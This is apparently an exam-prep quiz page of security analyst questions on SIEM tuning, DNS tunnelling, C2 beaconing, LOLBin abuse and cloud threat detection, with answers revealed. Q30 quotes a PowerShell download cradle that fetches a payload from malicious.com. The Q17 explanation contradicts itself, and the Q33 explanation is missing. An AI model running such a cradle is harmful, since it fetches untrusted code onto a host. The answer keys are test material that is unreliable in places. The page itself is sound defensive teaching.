Courseiva

CCNA Security Questions

75 of 125 questions · Page 1/2 · Security topic · Answers revealed

1
MCQeasy

During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?

A.Normal DNS resolution
B.Beaconing to command and control
C.Data exfiltration via DNS tunnelling
D.HTTP smuggling attack
AnswerC

Attackers frequently use DNS tunneling to bypass firewalls by encapsulating non-DNS protocols and encrypted payloads inside DNS packets. Because TCP port 53 allows for larger, reliable data streams compared to UDP, persistent encrypted traffic on this port is a classic indicator of an active data exfiltration channel.

Why this answer

Port 53 is used for DNS, which typically uses UDP. Encrypted traffic on TCP/53 suggests DNS tunnelling, where data is exfiltrated inside DNS queries and responses.

2
MCQmedium

A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?

A.Authentication logs and firewall logs
B.Authentication logs and DNS logs
C.Firewall logs and IDS logs
D.Endpoint logs and cloud audit logs
AnswerA

Correlating authentication logs with firewall logs allows analysts to map failed login attempts to specific external IP addresses and network traffic patterns. This combination is essential for identifying distributed brute-force attacks, as it links application-level credential failures with network-level connection attempts.

Why this answer

Authentication logs show login attempts, and firewall logs show source IPs; combining them can detect multiple failed logins from an IP.

3
MCQeasy

An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?

A.AWS Config
B.AWS GuardDuty
C.AWS CloudTrail
D.AWS Inspector
AnswerB

AWS GuardDuty is a continuous security monitoring and threat detection service that analyzes VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail S3 data events, and DNS logs. It utilizes threat intelligence feeds, machine learning, and anomaly detection to identify malicious activities, such as compromised EC2 instances, credential exfiltration, or unauthorized access within the AWS environment.

Why this answer

AWS GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior in AWS accounts. It analyzes CloudTrail management events, VPC Flow Logs, and DNS logs to detect suspicious API calls, credential compromise, and other threats using machine learning and threat intelligence. This directly matches the requirement for a cloud-native service to detect threats.

Exam trap

CS0-004 often tests the confusion between logging services (CloudTrail) and threat detection services (GuardDuty), where candidates might choose CloudTrail because it logs API calls, but it does not analyze them for threats.

How to eliminate wrong answers

Option A is wrong because AWS Config is a configuration auditing service that records resource configurations and evaluates compliance, but it does not detect threats or suspicious API calls. Option C is wrong because AWS CloudTrail logs API activity but does not analyze it for threats; it is a logging service, not a detection service. Option D is wrong because AWS Inspector is a vulnerability management service that scans EC2 instances and container images for software vulnerabilities and network reachability, but it does not monitor for suspicious API calls or credential compromise.

4
MCQeasy

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

A.CASB alert investigation
B.Vulnerability scan result
C.Cloud audit log analysis
D.Threat intelligence finding
AnswerD

AWS GuardDuty actively leverages continuously updated threat intelligence feeds, including lists of known malicious IP addresses, domains, and attack signatures, to identify suspicious activity. When an EC2 instance communicates with an IP address or domain identified as a known command and control (C2) server by these feeds, GuardDuty generates a finding, indicating a high probability of compromise and C2 communication.

Why this answer

GuardDuty detects threats based on known malicious IPs, so communication with a C2 IP is a security finding indicating a potential compromise.

5
Multi-Selectmedium

A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?

Select 2 answers
A.Aggregate alerts by source IP and time window
B.Disable the rule entirely
C.Whitelist IP addresses of internal services that generate repeated failed logins
D.Increase the alert severity threshold
E.Increase the log retention period
AnswersA, C

Aggregating alerts by source IP and time window groups multiple failed login attempts into a single, consolidated alert, effectively suppressing repetitive notifications while still preserving detection of brute-force or credential-stuffing activity. This correlation technique condenses dozens or hundreds of individual events into one actionable incident, reducing analyst alert fatigue and allowing the security team to focus on the actual attack pattern rather than being overwhelmed by event-level noise.

Why this answer

Option A is correct because aggregating failed-login alerts by source IP and time window (e.g., using a threshold such as 5 failures in 5 minutes) collapses repetitive noise into a single meaningful event, preserving visibility into brute-force patterns while cutting alert volume. Option C is correct because whitelisting known internal service IPs that legitimately produce repeated failed logins (e.g., misconfigured service accounts or scanners) suppresses expected benign activity without hiding genuine external attack attempts. Option B is wrong because disabling the rule entirely eliminates detection of brute-force and credential-stuffing attacks, destroying security visibility.

Option D is wrong because raising the severity threshold only changes how alerts are labeled or escalated; it does not reduce the number of false-positive alerts generated. Option E is wrong because increasing log retention affects storage duration, not alert generation, so it does nothing to address alert fatigue.

Exam trap

The trap is choosing severity threshold changes or retention increases as if they reduce alert volume — they do not; only aggregation, correlation, and suppression actually cut false positives.

6
MCQeasy

Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?

A.They are less likely to crash services
B.They provide more accurate results by checking internal configurations
C.They are faster and less intrusive
D.They do not require network access
AnswerB

Logging in with valid credentials lets the scanner query installed package versions, registry keys, running services, and local patch levels directly from the OS, producing far fewer false positives and negatives than inferring vulnerabilities purely from external banners and network responses.

Why this answer

Credentialed scans can access the OS and applications, allowing deeper inspection of installed software, patches, and configuration settings.

7
MCQeasy

A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?

A.Increase the severity of the alert
B.Reclassify the alert as a true positive
C.Create a suppression rule for that event ID
D.Disable the SIEM correlation engine
AnswerC

Implementing a suppression rule allows the SIEM to filter out or silence specific, known-benign event IDs under defined conditions. This directly reduces alert fatigue and noise in the console, allowing analysts to focus on legitimate security threats without losing the underlying log data.

Why this answer

True positive alerts are genuine threats; false positives are benign. Tuning the SIEM to suppress known false positives reduces alert fatigue.

8
MCQmedium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?

A.Port scanning activity
B.Command and control beaconing
C.Data exfiltration via DNS tunnelling
D.Lateral movement using SMB
AnswerB

Command and control (C2) beaconing involves an infected host periodically initiating outbound connections to a C2 server, often on a non-standard port like 4444, to check for new commands or upload data. These connections are typically regular, repetitive, and consistent in their destination and port, fitting the description of repeated connections to a single IP on port 4444. This behavior establishes a persistent communication channel for remote control of the compromised system.

Why this answer

Repeated connections to a known malicious IP on a non-standard port with encrypted payloads strongly suggest command and control (C2) beaconing.

9
MCQhard

An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?

A.Sigma rule on process creation events
B.NetFlow analysis for data volume
C.YARA rule matching on process memory
D.DNS log analysis for entropy and frequency
AnswerD

DNS log analysis is the most effective method for identifying Domain Generation Algorithm (DGA) activity by examining the structural properties of queried domains. Analysts can calculate the Shannon entropy of domain strings to detect anomalous randomness and monitor query frequency for rapid bursts of failed resolutions (NXDOMAIN responses). This mathematical and behavioral analysis directly exposes the automated, algorithmic nature of DGA-based command-and-control (C2) communication.

Why this answer

DGA domains can be detected by analyzing DNS query patterns for algorithmic generation, often using frequency analysis or ML models.

10
MCQhard

During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?

A.Normal behavior for Windows services
B.Evidence of a DLL injection attack
C.Potential LOLBin abuse with anomalous parent-child relationship
D.Indicative of a process hollowing attack
AnswerC

Attackers frequently leverage legitimate binaries like svchost.exe as Living off the Land Binaries (LOLBins) to evade detection and bypass application whitelisting. In a standard Windows environment, services.exe is the exclusive parent process of svchost.exe. Observing cmd.exe spawning svchost.exe represents an anomalous parent-child relationship that strongly indicates an adversary attempting to masquerade malicious execution under a trusted system process name.

Why this answer

svchost.exe should normally run under SYSTEM or NETWORK SERVICE with 'services.exe' as parent. A user-level svchost.exe with cmd.exe parent indicates a potential LOLBin misuse.

11
Multi-Selectmedium

A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?

Select 3 answers
A.Unusual outbound DNS queries to known malicious domains
B.An RDP connection from a domain controller to a workstation
C.Creation of a new service on a remote system using sc.exe
D.Multiple failed logins from a single workstation to many servers
E.Execution of PsExec from a non-administrative workstation
AnswersB, C, E

In a secure architecture, administrative traffic flows from privileged workstations to domain controllers, never the reverse. An outbound Remote Desktop Protocol (RDP) connection originating from a domain controller to a standard workstation is highly anomalous and strongly indicates an adversary is leveraging compromised domain-level credentials to pivot downstream.

Why this answer

Lateral movement often involves remote execution tools (PsExec), remote service creation, and suspicious RDP connections.

12
Multi-Selectmedium

A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?

Select 2 answers
A.Firewall logs
B.Endpoint registry logs
C.DNS server logs
D.Authentication logs
E.NetFlow/IPFIX
AnswersC, E

DNS server logs are the primary source for detecting DNS tunneling because they contain the queried domain name, client IP, timestamp, record type (e.g., A, TXT, CNAME), and response size. Tunneling often manifests as base64-encoded subdomains, unusually long FQDNs, or high volumes of TXT/ANY queries with large response payloads—all visible directly in these logs. Correlating such patterns across multiple queries to the same domain from a single internal host provides strong, specific evidence of tunneling.

Why this answer

DNS server logs (C) are essential because they capture the actual query names, record types (e.g., TXT, NULL, CNAME), response sizes, and query/response patterns that reveal the encoded exfiltration payloads and high-entropy subdomains typical of DNS tunneling. NetFlow/IPFIX (E) provides flow-level metadata such as packet and byte counts, flow duration, and destination IPs/ports, which helps confirm the sustained, periodic, or oversized DNS traffic volume to an external resolver that the SIEM rule flagged. Together these sources let the analyst validate that the high query volume is anomalous in content (C) and in traffic behavior (E), which is what distinguishes tunneling from benign DNS activity.

Firewall logs (A) mainly show allowed/denied connections and port usage rather than DNS query content, so they add limited confirmation value here. Endpoint registry logs (B) are unrelated to DNS query behavior, and authentication logs (D) would only help if credential abuse were suspected, neither of which supports confirming DNS tunneling.

Exam trap

CS0-004 often tests the misconception that firewall logs are the best corroborating source for DNS tunneling, when DNS server logs and NetFlow/IPFIX provide the query content and flow volume evidence that actually confirms the tunnel.

13
MCQmedium

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?

A.Snort rule
B.YARA rule
C.Suricata rule
D.Sigma rule
AnswerD

Sigma is an open, standardized signature format designed specifically for describing log events in a SIEM-neutral manner. It allows security analysts to write rules targeting process creation logs (such as Windows Event ID 1) to detect malicious command-line executions, such as regsvr32.exe loading remote scripts, which can then be converted into target SIEM queries like Splunk or ELK.

Why this answer

Sigma is a generic, open signature format for log-based detection rules that can be converted to multiple SIEM query languages (Splunk, Elastic, Sentinel, etc.). Because the question asks for a rule type effective across multiple endpoints and the technique involves process execution (regsvr32.exe), a Sigma rule targeting process creation events is the most portable and effective choice. It can be deployed across heterogeneous endpoint detection platforms.

Exam trap

CS0-004 often tests the confusion between network-based detection (Snort/Suricata) and host-based detection (Sigma/YARA), and between file-signature matching (YARA) and behavioral process matching (Sigma).

How to eliminate wrong answers

Option A is wrong because Snort is a network intrusion detection system that inspects packets, not endpoint process execution, so it cannot detect regsvr32.exe execution on hosts. Option B is wrong because YARA rules match patterns in files or memory (malware signatures), not process command-line behavior across endpoints. Option C is wrong because Suricata, like Snort, is a network-based IDS/IPS and does not inspect endpoint process creation events.

14
MCQmedium

A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?

A.Indicates a compromised account being used for data exfiltration
B.True positive - but only if the user has been phished
C.False positive - the user is working overtime
D.Indicates a misconfigured CASB policy
AnswerA

This alert strongly indicates a compromised account because the combination of an unmanaged personal device, anomalous off-hours access, and high-volume data downloads aligns perfectly with a classic data exfiltration pattern. Cloud Access Security Brokers (CASBs) utilize User and Entity Behavior Analytics (UEBA) to detect these deviations from established baselines, signaling that an unauthorized actor is likely draining corporate data storehouses.

Why this answer

Atypical data download from a cloud service to a personal device outside business hours is a strong indicator of data exfiltration.

15
Multi-Selecthard

An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?

Select 3 answers
A.User activity logs from the cloud application
B.Threat intelligence feeds for the source IP address
C.Firewall logs showing outbound connections
D.Vulnerability scan results for the user's workstation
E.Authentication logs from the identity provider
AnswersA, B, E

Cloud application activity logs reveal exactly what the user did after the atypical sign-in, such as downloads, shares or configuration changes. Correlating these actions with the CASB geolocation alert distinguishes genuine malicious behaviour from legitimate travel or VPN use.

Why this answer

Option A (User activity logs from the cloud application) is correct because these logs reveal what the user actually did inside the SaaS app—file downloads, sharing changes, admin actions, or mass data access—which distinguishes benign travel-related access from malicious exfiltration or account takeover. Option B (Threat intelligence feeds for the source IP address) is correct because enriching the source IP with reputation, proxy/VPN/Tor exit-node, and known-bad infrastructure data helps determine whether the geolocation is a hostile or anonymized source rather than the legitimate user. Option E (Authentication logs from the identity provider) is correct because IdP logs show the authentication context—MFA success/failure, device, session token issuance, impossible-travel patterns, and sign-in risk—confirming whether the session was legitimately established or the result of credential compromise.

Option C (Firewall logs showing outbound connections) is not among the marked answers because outbound firewall metadata generally shows only IP/port/protocol and cannot confirm user identity or in-app behavior, adding little beyond what the CASB alert and IP reputation already provide. Option D (Vulnerability scan results for the user's workstation) is not among the marked answers because endpoint vulnerabilities describe potential exposure and do not indicate whether this specific cloud access was malicious or legitimate.

Exam trap

CS0-004 often tests the temptation to include infrastructure logs (firewall, vulnerability scans) that seem security-relevant but do not answer the specific question of whether a cloud-app access from an unusual location is malicious — the exam expects identity, activity, and threat-intel correlation.

16
Multi-Selectmedium

A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?

Select 2 answers
A.Review the cloud application's audit logs for file access or sharing events
B.Disable the user's account immediately
C.Reset the user's password without further analysis
D.Check the user's recent authentication logs for successful logins
E.Block all access to the cloud application from that location
AnswersA, D

Cloud application audit logs (e.g., Microsoft 365's Unified Audit Log or Google Workspace's Admin Log) provide a tamper-evident record of every file access, download, share, and permission change linked to a user or session. By correlating the CASB alert's timestamp, source IP, and geolocation with these logs, the analyst can determine definitively whether sensitive files were opened, downloaded, or shared externally. This evidence-first approach confirms or refutes exfiltration and helps scope the incident without causing business disruption.

Why this answer

Checking the user's recent authentication logs can confirm if the access was legitimate. Reviewing the cloud application's audit logs can provide details on the activities performed. The other options are less relevant or too broad.

17
MCQmedium

During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?

A.Check the Run registry keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
B.Review the Windows Security Event Log for event ID 4698 (scheduled task creation)
C.Examine the System event log for driver loading events
D.Analyze the application event log for error messages
AnswerB

Reviewing the Windows Security Event Log for event ID 4698 is the most direct and effective method to detect the creation of new scheduled tasks. This specific event ID explicitly logs when a scheduled task is registered on the system, providing crucial forensic evidence of a potential persistence mechanism established by an attacker. Analyzing these logs allows analysts to identify the task name, creator, and associated command, which are vital details for incident response.

Why this answer

Scheduled tasks are stored in the Windows Task Scheduler and can be viewed via schtasks.exe, but the registry also contains persistence mechanisms. However, scheduled tasks are not primarily stored in the registry; they are in %SystemRoot%\Tasks. Alternatively, the analyst can use the Task Scheduler API.

But among the options, examining the 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule' is not standard. Actually, the correct answer is to examine the Task Scheduler logs or the tasks folder. However, the question specifies registry key or log source.

The best answer is to review the Windows Security Event Log for event ID 4698 (scheduled task creation).

18
MCQeasy

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

A.Add the scanner's IP to an allowlist in the rule
B.Disable the rule permanently
C.Report the scanner as compromised
D.Increase the severity of the rule
AnswerA

Adding the authorized scanner's IP address to an exclusion or allowlist within the specific detection rule suppresses benign alerts generated by scheduled vulnerability assessments. This targeted tuning preserves the rule's efficacy for detecting actual malicious activity from unauthorized sources while eliminating alert fatigue caused by known, legitimate scanning activities.

Why this answer

The alerts are false positives because the traffic is legitimate. The analyst should tune the rule to exclude the scanner's source IP addresses.

19
MCQhard

A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?

A.A Windows update process
B.Normal administrative activity
C.A false positive from EDR
D.Living off the land binary (LOLBin) usage
AnswerD

This is a living-off-the-land binary technique: adversaries hijack a legitimate, digitally signed process like svchost.exe to launch PowerShell so the activity blends into normal system noise and evades signature-based defenses. The subsequent external network connection from the PowerShell child strongly suggests staged malware download or C2 beaconing, warranting immediate containment and further EDR correlation.

Why this answer

The behavior described — svchost.exe spawning powershell.exe, which then makes an outbound network connection — is a classic example of a Living off the Land Binary (LOLBin) attack. LOLBins are legitimate, signed Windows executables (like PowerShell, certutil, mshta, regsvr32) that adversaries abuse to blend malicious activity into normal system noise, evading signature-based detection. Because svchost.exe is a trusted system process, its child processes are often overlooked by naive detection rules, making this pattern a high-fidelity threat-hunting indicator.

Exam trap

CS0-004 often tests whether candidates can distinguish between legitimate Windows process behavior and LOLBin abuse — the trap is assuming that because svchost.exe is a trusted system process, any activity it initiates is benign.

How to eliminate wrong answers

Option A is wrong because Windows Update runs under the Windows Update service (wuauserv) and uses svchost.exe but does not spawn powershell.exe to make arbitrary outbound connections to external IPs. Option B is wrong because normal administrative activity typically involves interactive PowerShell sessions initiated by a user or admin, not svchost.exe spawning powershell.exe with immediate external network egress. Option C is wrong because while false positives are possible, the specific parent-child chain (svchost → powershell → external IP) is a well-documented LOLBin abuse pattern, not a benign EDR artifact.

20
MCQmedium

A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?

A.Authentication logs
B.Cloud audit logs
C.DNS logs
D.Firewall logs
AnswerA

Authentication logs capture critical event IDs related to logon attempts, such as Windows Event ID 4624 (successful logon) and 4625 (failed logon). Analyzing these logs allows security analysts to detect anomalous authentication patterns, lateral movement, and pass-the-hash (PtH) attacks by identifying unusual logon types (like Type 3 network logons) or mismatched credentials.

Why this answer

Authentication logs (e.g., Windows Security Event ID 4624) contain details about logon types (e.g., Network logon) and account names, which are crucial for detecting pass-the-hash.

21
MCQmedium

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

A.Non-credentialed scans during business hours
B.External scans only
C.Credentialed agent-based scans during off-peak hours
D.Continuous non-credentialed scans
AnswerC

Agent-based scanning runs locally on each host and reports findings without the scanner sending intrusive network probes across the wire, and scheduling those scans for off-peak hours further ensures any residual resource usage does not compete with production workloads, directly satisfying both the accuracy and minimal-disruption requirements.

Why this answer

Credentialed scans provide more accurate results by accessing the system deeply, but they can cause load. Agent-based scans reduce network load and allow scheduling, minimizing disruption.

22
MCQmedium

An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?

A.Authentication logs and user IDs
B.Firewall logs and connection timestamps
C.Endpoint logs and process creation
D.DNS logs and query types
AnswerB

Firewall logs capture outbound network connections, while connection timestamps provide the temporal data required to calculate the intervals between these sessions. By correlating these timestamps, analysts can perform frequency analysis to identify highly regular, automated communication intervals (heartbeats) characteristic of command-and-control (C2) beaconing.

Why this answer

Beaconing involves periodic outbound connections, so firewall logs (source IP, destination IP, destination port) and connection timestamps are essential for detecting regularity.

23
MCQeasy

An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?

A.tcpdump
B.netstat
C.iperf
D.nmap
AnswerA

tcpdump is the industry-standard command-line utility for capturing and analyzing network packets directly on Linux systems. It interfaces with the libpcap library to intercept and display TCP/IP and other packets being transmitted or received over a network interface. Analysts can apply complex Berkeley Packet Filter (BPF) expressions to isolate specific traffic of interest for real-time analysis or save the capture to a PCAP file for offline inspection.

Why this answer

tcpdump is a powerful command-line packet analyzer for Linux, capable of capturing network traffic in real time and saving it for later analysis.

24
MCQmedium

A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?

A.Create a new security group allowing SSH only from known IPs and attach it to the instance
B.Terminate the EC2 instance immediately
C.Disable the GuardDuty alert to reduce noise
D.Install a host-based firewall on the instance to block SSH
AnswerA

Modifying the AWS security group to restrict SSH access to specific, trusted source IP addresses immediately mitigates the brute-force or unauthorized access attempt. This stateful firewall change is applied at the hypervisor level, ensuring legitimate administrative access is preserved while blocking malicious traffic before it reaches the operating system.

Why this answer

The instance is exposed to the internet on SSH. Restricting SSH access to known IP addresses reduces the attack surface. Creating a new security group with a narrow source range and applying it stops brute force attempts.

25
MCQeasy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?

A.Accept the risk due to compensating controls.
B.Disable the WAF to test the vulnerability.
C.Immediately patch the server during business hours.
D.Run an uncredentialed scan to confirm the vulnerability.
AnswerA

Internal-only reachability and a WAF that actively blocks the specific attack vector are legitimate compensating controls that meaningfully reduce exploitability, so documenting a formal risk acceptance with those controls noted, an owner, and a review date is the appropriate response rather than treating the raw CVSS score as the sole driver of urgency.

Why this answer

Compensating controls like a WAF that effectively blocks the attack reduce the risk. While patching is ideal, the vulnerability may not be immediately exploitable due to the WAF.

26
Multi-Selecthard

A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?

Select 3 answers
A.Large DNS payload sizes
B.DNS responses with NXDOMAIN for most queries
C.Non-standard record types such as TXT or NULL
D.High frequency of DNS queries to a single domain
E.Use of standard A record queries
AnswersA, C, D

Large DNS payload sizes are a classic indicator of tunneling because standard DNS queries and responses are deliberately small—classic UDP DNS is limited to 512 bytes without EDNS0, and even with EDNS0 typical resolvers rarely see TXT records exceeding a few hundred bytes. Tunneled traffic (via TXT or NULL records) packs encoded data into the payload, causing individual DNS messages to balloon in size and break from the statistical norm. This size anomaly is often detected when the maximum payload length or the distribution of payload sizes for a domain appears abnormal.

Why this answer

Option A is correct because DNS tunneling encodes exfiltrated or command-and-control data inside DNS queries and responses, which inflates payload sizes well beyond the small packets typical of legitimate lookups. Option C is correct because attackers often abuse TXT or NULL records, which can carry arbitrary or binary data, to transport payloads that standard A record queries cannot hold. Option D is correct because tunneling tools generate a high volume of queries to a single domain (often with encoded subdomains) to move data continuously, making query frequency to one domain a strong indicator.

Option B is not indicative because NXDOMAIN responses usually reflect mistyped or nonexistent domains rather than successful tunneling, which typically relies on the authoritative server answering queries. Option E is not indicative because standard A record queries are the normal, benign behavior of DNS resolution and do not by themselves suggest tunneling.

Exam trap

CS0-004 often tests the misconception that NXDOMAIN or standard A records indicate tunneling, when the real indicators are payload size, non-standard record types, and query frequency to a single domain.

27
MCQmedium

A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?

A.A high number of NXDOMAIN responses
B.Unusually long subdomain names with high query frequency to a single domain
C.Consistent query intervals to a known legitimate domain
D.Queries to domains that are less than 24 hours old
AnswerB

DNS tunneling utility tools encode payload data, such as commands or exfiltrated files, directly into the subdomain labels of a query destined for an attacker-controlled authoritative DNS server. Because of this encoding, the subdomains appear as long, high-entropy, randomized strings. A high frequency of these unique, lengthy queries directed to a single external domain is a definitive signature of active DNS tunneling.

Why this answer

DNS tunneling exfiltrates data or establishes command-and-control by encoding payloads into DNS query names, typically subdomains of an attacker-controlled domain. This produces unusually long subdomain labels (often near the 63-character label limit or 253-character FQDN limit) combined with high query volume to a single domain, because each query carries a chunk of encoded data. Option B captures both the encoding artifact (long names) and the beaconing pattern (high frequency to one domain) that together are the hallmark of tunneling tools like iodine, dnscat2, or DNSExfiltrator.

Exam trap

CS0-004 often tests the distinction between generic suspicious DNS behaviors (NXDOMAIN floods, new domains) and the specific encoding-plus-frequency signature that uniquely identifies DNS tunneling, so candidates who pick 'new domain' or 'NXDOMAIN' miss the payload-carrying subdomain pattern.

How to eliminate wrong answers

Option A is wrong because a high volume of NXDOMAIN responses more commonly indicates DGA (domain generation algorithm) malware, typosquatting lookups, or misconfigured clients — tunneling tools usually need successful resolution of the tunnel domain, so NXDOMAIN spikes are not the primary indicator. Option C is wrong because consistent query intervals to a known legitimate domain is normal behavior (e.g., NTP-adjacent lookups, CDN health checks, or OS telemetry) and lacks the payload-carrying long subdomain names that tunneling requires. Option D is wrong because newly registered domains are a threat-intelligence signal for phishing, malware distribution, or C2 infrastructure generally, but domain age alone does not indicate DNS tunneling — tunneling can occur over long-established domains too.

28
MCQmedium

A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?

A.Accept the risk and document the compensating control
B.Remove the WAF to allow the vulnerability to be exploited
C.Immediately patch the server
D.Mark the vulnerability as a false positive
AnswerA

Since an active Web Application Firewall (WAF) is successfully mitigating the vulnerability by blocking malicious traffic, the immediate threat is neutralized. Formally accepting the risk and documenting this compensating control in the risk register is the correct procedure, ensuring compliance and operational continuity without unnecessary disruption.

Why this answer

Compensating controls like a WAF can justify accepting the risk rather than immediately patching if it would cause downtime.

29
MCQmedium

A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?

A.Compromised AWS credentials
B.Configuration drift
C.Service outage
D.Valid administrative activity
AnswerA

When threat actors acquire leaked or stolen AWS Access Keys, they frequently leverage programmatic access to bypass MFA and spin up high-compute EC2 instances for cryptomining. This malicious activity is typically detected via AWS CloudTrail logs showing API calls originating from unfamiliar IP addresses or targeting unused geographic regions.

Why this answer

Unauthorized API calls to create resources in unusual regions often indicate compromised credentials or an attacker using the account for cryptomining.

30
MCQhard

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

A.PowerShell download cradle
B.WMI persistence
C.Scheduled task creation
D.DLL side-loading
AnswerA

This option is correct because the EDR alert describes a PowerShell download cradle, a classic Living off the Land (LotL) technique where command-line utilities like Invoke-WebRequest or Net.WebClient are abused to fetch and execute malicious code. Security analysts frequently flag these patterns because they bypass traditional file-based detection mechanisms by leveraging trusted system binaries to download payloads directly into memory or disk.

Why this answer

The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.

31
MCQeasy

A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?

A.Denial-of-service attack
B.Port scanning
C.Normal backup operation
D.Data exfiltration
AnswerD

Data exfiltration is characterized by an anomalous, large-volume outbound data transfer, often utilizing encrypted protocols like HTTPS or SFTP to bypass deep packet inspection. The NetFlow record's asymmetric flow pattern—showing minimal inbound bytes and a massive outbound payload to an external host—is a classic indicator of compromise. This signature points directly to an attacker successfully staging and extracting sensitive corporate data.

Why this answer

Data exfiltration is correct because the pattern — a large volume of data transferred from an internal server to an external IP on port 443 during non-business hours — matches the classic signature of data exfiltration. Port 443 (HTTPS) is commonly used to blend in with normal encrypted web traffic, and off-hours timing plus high volume to an external destination indicates unauthorized data transfer.

Exam trap

CS0-004 often tests the confusion between exfiltration and DoS — candidates see 'large amount of data' and think attack volume, but the direction (outbound to external IP) and timing (off-hours) are the discriminators for exfiltration.

How to eliminate wrong answers

Option A is wrong because a denial-of-service attack is characterized by flooding a target with traffic to exhaust resources, not by a large outbound transfer from an internal server to an external IP; DoS would show high inbound or reflected traffic patterns. Option B is wrong because port scanning involves many connection attempts to multiple ports with little data transfer, producing small SYN packets across a port range — not a large sustained data flow on a single port. Option C is wrong because normal backup operations typically target internal backup servers or known cloud backup endpoints on scheduled windows, and the question frames the external IP and off-hours timing as suspicious; a legitimate backup would be to a known, authorized destination, not an unidentified external IP.

32
MCQeasy

Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?

A.Scheduled Task
B.Run key
C.Service
D.Startup folder
AnswerB

The "Run" and "RunOnce" Registry keys are classic and highly effective persistence mechanisms. Entries added to `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` or `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` instruct Windows to automatically launch specified programs or scripts every time a user logs on. This direct Registry modification ensures the malicious payload executes without requiring user interaction, making it a prime target for attackers seeking to maintain access.

Why this answer

The 'Run' registry key is commonly used to launch programs automatically at user logon, making it a persistence mechanism.

33
MCQmedium

A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?

A.Add an exclusion list for known good command-line arguments or parent processes
B.Change the rule to trigger only on network connections from rundll32.exe
C.Disable the rule entirely
D.Increase the severity threshold of the rule
AnswerA

By implementing a baseline of authorized parent-child process relationships or whitelisting known-good command-line arguments, analysts can significantly suppress benign positive alerts. This targeted tuning preserves the SIEM's ability to detect anomalous or unauthorized executions of the binary while minimizing alert fatigue.

Why this answer

